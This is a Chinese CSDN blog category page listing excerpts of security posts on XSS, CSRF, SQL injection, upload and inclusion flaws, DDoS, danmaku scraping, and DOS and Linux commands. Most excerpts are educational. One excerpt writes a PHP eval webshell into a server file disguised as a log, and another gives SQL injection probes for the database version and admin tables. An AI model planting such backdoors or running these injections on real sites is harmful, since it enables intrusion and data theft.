![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全技术/黑客技术
坦GA
积沙成塔
展开
-
跨站脚本攻击(XSS)--简介
英文全称(Cross Site Script),简称“XSS”。 XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 XSS根据效果不同分为: 1.反射型XSS例如:${input}正常URL请求假设是这样:http://www.a.com/test.htm?param=这是一个测试!传递给变量i原创 2016-08-21 20:48:47 · 621 阅读 · 0 评论 -
如何写一只抓哔哩哔哩弹幕的爬虫
原文地址:http://blog.csdn.net/bigbigsman/article/details/78639053如何写一只抓哔哩哔哩弹幕的爬虫爬虫工作流程解析首页获得视频cid构造所有的获取弹幕链接解析xml文件并插入数据库遍历获取每一集的弹幕内容1、解析首页获取每一集的cid和内容访问静态页面,利用lxml解析视频cid和视频内容 解析如下标记的内容: 2、构造获取弹幕链接构造得到弹幕...转载 2018-03-05 10:30:03 · 1051 阅读 · 0 评论 -
Chrome分析网页获取Bilibili弹幕
原文地址:http://blog.csdn.net/u011327333/article/details/78690965Chrome分析网页-一步步获取Bilibili弹幕Chrome 提供的8大工具简介Elements从浏览器的视角来看页面,也就是说我们可以看到chrome渲染页面所需要的HTML,CSS和DOM(Document Object Model)对象。此外,还可以编辑这些内容更改页...转载 2018-03-05 13:49:06 · 1287 阅读 · 0 评论 -
抓取斗鱼直播弹幕
原文地址:http://blog.csdn.net/bfboys/article/details/52853041前几天看了知乎的一个问题(如何获取斗鱼直播间的弹幕信息?)之后,才有了这个想法。一直对抓取信息比较感兴趣,这次也不会错过咯,尝试一下 →.→抓取数据的基本思路就是: 抓包 → 分析请求信息 → 模拟发送请求 → 获得数据知乎回答地址:如何获取斗鱼直播间的弹幕信息? - Brucezz ...转载 2018-03-05 15:33:53 · 8886 阅读 · 0 评论 -
抓取熊猫TV弹幕
原文地址:http://blog.csdn.net/gaopu12345/article/details/50609663前天看到了别人写的抓取斗鱼弹幕的程序,抓取斗鱼弹幕是我很早以前的一个想法,但是无奈不会写,不懂得tcp传过来的那些字节的含义,所以没写出来,当我看到别人写好的代码,我就参照人家的博客自己实现了一遍,今天我就想熊猫tv应该也是差不多的,所以自己写了一个抓熊猫TV弹幕的代码。有想抓...转载 2018-03-05 15:49:46 · 717 阅读 · 0 评论 -
Linux之在CentOS上一次艰难的木马查杀过程
原文地址:https://blog.csdn.net/xpb1980/article/details/76647355今天朋友说他一台要准备上线的生产服务器被挂马,特征ps命令找不到进程,top能看到负载最高的一个程序是一个随机的10位字母的东西,kill掉之后自动再次出现一个随机10位字母的进程。我让他关闭这个机器的外网,内网放开,在局域网中给我一个跳板。等我拿到权限之后进入机器,先按照朋友说的...转载 2018-04-17 15:19:31 · 863 阅读 · 0 评论 -
Nginx安全
比如CVE-2010-2266是一个Nginx的拒绝服务漏洞。就软件安全本身来看,Nginx和Apache最大的区别在于,检查Apache安全时更多的要关注Module的安全,而Nginx则需要注意软件本身的安全,及时升级软件版本。与Apache一样,Nginx也应该以单独的身份运行,这是所有Web Server、容器软件应该共同遵守的原则。Nginx的配置非常灵活,在对抗DDOS和C...原创 2018-09-11 15:21:14 · 682 阅读 · 0 评论 -
MVC框架安全
从数据的流入来看,用户提交的数据先后流经了View层、Controller、Model层,数据的流出则反过来。在设计安全方案时,要牢牢把握住数据这个关键因素。在MVC框架中,通过切片、过滤器等方式,往往能对数据进行全局处理,这为设计安全方案提供了极大的便利。比如在Spring Security中,通过URL pattern实现的访问控制,需要由框架来处理所有用户请求,在Spring Secur...原创 2018-09-11 15:42:28 · 999 阅读 · 0 评论 -
Web框架与CSRF防御
在Web框架中可以使用Security token解决CSRF攻击的问题。CSRF攻击的目标,一般都会产生“写数据”操作的URL,比如“增”、“删”、“改”;而“读数据”操作并不是CSRF攻击的目标,因为在CSRF的攻击过程中攻击者无法获取到服务器端返回的数据,攻击者只是借用户之手触发服务器动作,所以读数据对于CSRF来说并无直接的意义。因此,在Web应用开发中,有必要对“读操作”和“写操...原创 2018-09-11 15:59:46 · 490 阅读 · 0 评论 -
数据库攻击技巧
SQL注入可以猜解出数据库的对应版本,比如下面这段Payload,如果MySQL的版本是4,则会返回true。http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4下面这段Payload,则是利用union select来分别确认表名admin是否存在,列名passwd是否存在:id=5 union all se...原创 2018-09-11 16:20:08 · 2098 阅读 · 0 评论 -
文件上传漏洞概述
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力,这种攻击方式是最为直接和有效的,有时候几乎没有什么技术门槛。文件上传后导致的常见问题一般有:1.上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行。2.上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为(其它通过...原创 2018-09-11 17:48:47 · 924 阅读 · 0 评论 -
Cmd和Dos的区别(汇总)
原文地址:http://blog.csdn.net/lushuaiyin/article/details/6975241你在windows操作系统里进的DOS(即输入 CMD 进命令提示符)不是纯DOS,只是为方便某些需求而建立的,而纯DOS本身就是一种操作系统.(两者的区别:比如你可以在纯DOS下删除你的 windows系统,但在你所说的"命令提示符"里却不能,因为你不可能"在房子里面拆房子吧?...转载 2018-02-12 13:35:51 · 687 阅读 · 0 评论 -
简单Dos 命令与linux命令的区别
原文地址:http://blog.csdn.net/caiqcong/article/details/7484744简单Dos命令与linux命令的区别:功能DosLinux复制文件copycp移动文件movemv列举文件dirls清除屏幕clsclear退出exitexit显示修改日期datedate删除文件delrm回响信息到屏幕echoecho用编辑器编辑文件editvi比较文件内容fcdi...转载 2018-02-12 13:26:41 · 5109 阅读 · 0 评论 -
跨站点请求伪造(CSRF)--简介
全名(Cross Site Request Forgery)。 攻击者首先在自己的域构造一个页面:http://www.a.com/csrf.html 其内容为: 攻击者诱使目标用户访问这个页面。 该用户看到了一张无法显示的图片,再回过头看看搜狐博客,发现id=123456789的博客已经被删除了。 原来刚才访问http://www.a.com/csrf.html时,图片标原创 2016-08-21 22:06:26 · 734 阅读 · 0 评论 -
应用层拒绝服务攻击--DDOS简介
DDOS(Distributed Denial of Service)又称为分布式拒绝服务。DDOS本是利用合理的请求造成资源过载,导致服务不可用。 分布式拒绝服务攻击,将正常请求放大了若干倍,通过若干个网络节点同时发起攻击,以达成规模效应。这些网络节点往往是黑客们所控制的“肉鸡”,数量达到了一定规模后,就形成了一个“僵尸网络”。大型的僵尸网络,甚至达到了数万,数十万台的规模。如此规模的僵尸网原创 2016-08-21 22:16:38 · 1966 阅读 · 0 评论 -
注入攻击--SQL注入
注入攻击的本质是把用户输入的数据当做代码执行。这里有两个关键条件: 1)用户能够控制输入 2)原本程序要执行的代码,拼接了用户输入的数据SQL注入的典型例子var ShipCity;ShipCity = Request.form("ShipCity");var sql = "select * from OrdersTable where ShipCity='"+Sh原创 2016-08-22 09:20:42 · 1528 阅读 · 0 评论 -
基于Cookie的攻击和防御
原文地址:http://blog.csdn.net/jinhuiyu/article/details/5150895实现基于HTTP Cookie攻击的前提是目标系统在Cookie中保存了用户ID,凭证,状态等其他可以用来进行攻击的信息。通常的攻击方式有三种:1. 直接访问Cookie文件查找想要的机密信息2. 在客户端和服务端进行Cookie信息传递时候进行截取,进而转载 2016-10-25 09:52:37 · 4809 阅读 · 0 评论 -
Web安全浅析
原文地址:http://www.cnblogs.com/shenliang123/p/3835116.html1.1系统安全1.1.1 客户端脚本安全(1)跨站脚本攻击(XSS): XSS攻击,通常指黑客通过“html注入” 篡改了网页,插入了恶意的脚本,从而在用户浏览网页的时候,控制用户浏览器的一种攻击。 最常见的XSS攻击就是通过读转载 2016-10-26 17:34:30 · 759 阅读 · 0 评论 -
黑客常用 Linux 入侵常用命令
原文地址:http://blog.csdn.net/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog_time.php[jobcruit@wa64-054 rankup_l...转载 2018-02-10 10:49:33 · 15548 阅读 · 0 评论 -
查询局域网电脑的IP,端口号,MAC地址(黑客技术入门)
原文地址:http://blog.csdn.net/qq_21792169/article/details/51954815网上看到很多都是使用nmap工具,这个工具我没有使用过,我自己实现nmap工具的功能,首先我们查询局域网内有哪些电脑是alive的,下面我写了一个脚本:ping.sh 这样局域网内哪些电脑的ip是alive的就可以知道,下面来查看对于IP的MAC地址,使用cat /pro...转载 2018-02-11 11:13:34 · 9748 阅读 · 0 评论 -
Linux tcpdump命令详解
原文地址:https://www.cnblogs.com/ggjucheng/archive/2012/01/14/2322659.html简介用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。 tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络...转载 2018-02-11 11:52:35 · 272 阅读 · 0 评论 -
黑客常用dos命令详解
原文地址:http://blog.csdn.net/CSDN___LYY/article/details/778024381.DIR命令作用:显示磁盘目录所包含的内容格式:DIR[文件名][选项]例如:DIR D:\JDK 查询D盘下的JDK文件夹下的未隐藏文件DIR D:\JDK /A 查询D盘下的JDK文件夹下的所有文件DIR D:\JDK /S 查询D盘下的JDK文件夹下的包含子文件夹下的所...转载 2018-02-11 14:33:44 · 388 阅读 · 0 评论 -
2016年十大黑客工具
原文地址:http://blog.csdn.net/zhu123mei123rui123/article/details/50479236『自我陶醉黑客世界的朋友免不了要用到这些!』密码破解John The Ripper密码破解Aircrack-ng密码破解THC Hydra网络漏洞扫描器Burp Suite手动分析包工具Wireshark网络漏洞扫描器OWASP Zed取证Maltego漏洞监测...转载 2018-02-11 15:15:50 · 3123 阅读 · 1 评论 -
Dos命令之 arp (网络诊断与配置)使用详解
原文地址:http://blog.csdn.net/wang740209668/article/details/77622173arp命令用于显示和修改地址解析协议缓存表的内容,缓存表项是ip地址与网卡地址对,计算机上安装的每个网卡各有一个缓存表。使用不带参数的arp命令,可以得到帮助信息。arp命令语法如下: arp [-a [InetAddr] [-N IfaceAddr]] [-g [Ine...转载 2018-02-12 09:01:11 · 673 阅读 · 0 评论 -
文件包含漏洞
文件包含漏洞是“代码注入” 的一种,常见的导致文件包含的函数如下:PHP:include(),include_once(),require(),require_once(),fopen(),readfile()JSP/Servlet:ava.io.File(),java.io.FileReader().ASP:include file,include virtual要想成功利用文件...原创 2018-09-13 17:53:28 · 773 阅读 · 0 评论